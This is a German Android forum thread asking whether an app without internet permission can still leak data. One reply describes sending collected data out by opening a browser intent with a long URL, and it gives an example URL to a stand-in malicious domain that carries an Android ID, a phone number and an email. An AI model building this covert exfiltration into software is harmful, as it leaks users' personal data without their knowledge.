Rechte der Light Flow App

  • Antworten:12
  • OffenNicht stickyNicht beantwortet

23.12.2012 12:05:23 via Website

habe eben die Light Flow App entdeckt!
Sie benötigt ja echt viele Rechte...

Verstehe ich das richtig dass, angenommen sie hat die böse Absicht "Daten zu sammeln", sie keine Möglichkeit hat, diese weiter zu geben? Sie hat ja schließlich auch keine Internet-Freigabe!

Oder übersehe ich da etwas?

Desire HD > Note 2 LTE > Moto G > OnePlus One
root

23.12.2012 15:26:34 via Website

Theoretisch ist es durchaus möglich Daten ins Netz zu übermitteln auch ohne die entsprechende Berechtigung des Internetzugriffs.

Möglich wird das durch Ausnutzung des Intent Managements unter Android. Man ruft einfach einen Browserintent auf und übergibt diesem Intent eine URL. Der Trick dabei ist, die URL zum einen sehr lang zu gestalten so das man unmöglich die gesamte URL in der Adresszeile des Browsers sehen kann. Dann werden die zu übermittelnden Daten einfach an die URL angehängt.

Das kann zum Beispiel so aussehen: http://besonders.langeuniformresourcelocatorurl-ineinemfernenlandmitlauterboesewichten.ru/hierwerdendiedatenentgegengenommen.php?androidID=abc12345678&telefonnummer=066412312312&email=fragmich@nicht.com

(Wer da jetzt draufklickt ist selber Schuld) :grin:

Wenn der inhaber dieser Domain jetzt noch schlau genug ist, einen sofortigen Redirect zum Beispiel zu einer Hilfeseite einzubauen, dann wird eine solche Datenübertragung den meisten fast nicht auffallen.

Ich denke allerdings nicht, dass diese App vergleichbares tut .. auch wenn ich es nicht ausprobiert habe.

— geändert am 23.12.2012 15:29:55

lg Voss - Ach ja und noch was, die AndroidPIT-Regeln ლ(╹◡╹ლ) Android Security

23.12.2012 16:29:59 via App

Moritz B
Danke erstmal für die Erklärung Jörg. Wenn ich jetzt auf den Link klicken würde, kommen im Hintergrund Daten auf mein Gerät ? Könnten mir (meinem Handy) die Daten ohne eine entsprechende App Schaden zufügen ?
:lol:

denkst du der jörg würde hier so einen link einstellen?

ist doch nur ein Beispiel.. ;)
der führt nirgendwo hin.




⇨Dirty⇦ nexus⁴ [4.4.4]

⇨OmniRom⇦note 10.1 3g (N8000) [4.4.4]

⇨CodefireX⇦desire hd [4.2.2]

Theme Chooser Themes | Izzys App Übersicht | AndroidPITiden Buch

23.12.2012 21:33:09 via App

Moritz B
Stimmt aber bei einem verseuchten Link ?
Bei einem verseuchten Link passiert wohl was. Oder was war genau die Frage?

Hier geht es aber mehr um die App! ;-)

Desire HD > Note 2 LTE > Moto G > OnePlus One
root